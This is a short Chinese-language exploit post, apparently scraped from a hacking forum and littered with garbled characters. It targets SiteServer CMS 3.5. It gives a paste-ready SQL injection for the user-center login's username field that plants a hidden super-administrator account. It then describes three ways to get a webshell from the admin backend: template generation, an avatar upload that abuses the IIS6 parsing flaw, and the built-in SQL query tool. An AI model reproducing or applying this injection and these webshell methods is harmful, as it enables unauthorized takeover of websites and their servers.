经测试秒杀最新的3.5版
f; c9 z) @2 N( N+ D& estieserver官网:www.siteserver.cn" |8 V. k n3 |
EXP:7 u& c" L$ G1 ]3 q, |
直接访问UserCenter/login.aspx
2 u4 j0 u2 \, b( z用户名处输入:
9 ^6 x8 r1 A( G5 _* |
9 X1 |/ t3 [6 W& {123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
2 U2 w$ }% P; ?0 A ^$ V密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
- n/ U" e8 v' t! s+ n) p之后再访问后台SiteServer/login.aspx用插入的用户登陆8 ^) y+ A' R, y; ?
后台拿webshell的三种方法:
! g( t# K. h, f& y8 t+ ]: S) }. ^. k一、
5 f( _: J; V) r5 l3 d站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
. N# [1 L! {0 Z- G1 R5 T二、
! @# W6 _4 o% z9 N$ K- o: |成员权限-》添加用户-》用户名为:1.asp
- r6 B- G* d2 V* A- i2 Mhttp://127.0.0.1/usercenter/
* q' M6 {' v( z& Y1 O用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
# J. Q4 ?! w8 G& M4 Y2 `+ q7 \(ps:后台添加用户时不会验证是否含有非法字符)
* j1 |+ F% q6 y; W; q三、2 h7 l4 Z+ r1 J/ q U2 ~3 b7 K
系统工具-》实用工具-》机器参数查看3 k& ]8 O2 t) i
可以看到数据库类型、名称,WEB路径
. y" K8 r2 t2 s系统工具-》数据库工具-》SQL语句查询9 n1 r# I P1 q! S4 [! C- r' `7 o8 [
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |